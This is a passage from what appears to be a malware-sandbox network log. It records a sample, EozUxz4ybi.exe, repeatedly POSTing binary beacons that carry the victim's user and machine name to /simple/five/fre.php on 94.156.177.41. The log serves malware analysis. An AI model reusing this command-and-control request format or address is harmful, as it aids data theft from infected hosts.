                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:32.889368057 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:33.590639114 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:33 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.84971794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:34.060091019 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:34.065162897 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:34.808461905 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:34 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.84971894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:34.964698076 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:34.969892025 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:35.673820019 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:35 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.84972094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:35.843321085 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:35.848201990 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:36.597086906 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:36 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.84972294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:36.751585007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:36.756536007 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:37.453332901 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:37 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.84972394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:37.611859083 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:37.616844893 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:38.373198032 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:38 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.84972494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:38.529992104 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:38.534914017 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:39.300244093 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:39 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.84972594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:39.448384047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:39.453289986 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:40.181978941 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:40 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.84972694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:40.347589016 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:40.352447987 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:41.051228046 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:40 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.84972794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:41.202259064 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:41.207139015 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:41.903986931 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:41 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.84972894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:42.064344883 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:42.069380999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:42.789096117 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:42 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.84972994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:42.974584103 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:42.979512930 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:43.879904985 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:43 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.84973094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:44.025429010 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:44.030364990 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:44.715174913 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.84973194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:44.873852015 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:44.878655910 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:45.597421885 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:45 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.84973294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:45.906074047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:45.910981894 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:46.616846085 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:46 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.84973394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:46.762074947 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:46.766963005 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:47.494050980 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:47 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.84973494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:47.671560049 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:47.676875114 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:48.387887001 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:48 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.84973594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:48.540954113 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:48.545842886 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:49.285383940 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:49 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.84973694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:49.433276892 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:49.438318968 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:50.165489912 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:50 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.84973794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:50.336088896 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:50.341120958 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:51.033304930 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:50 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.84973894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:51.203758001 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:51.209450960 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:51.929786921 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:51 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.84973994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:52.284070015 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
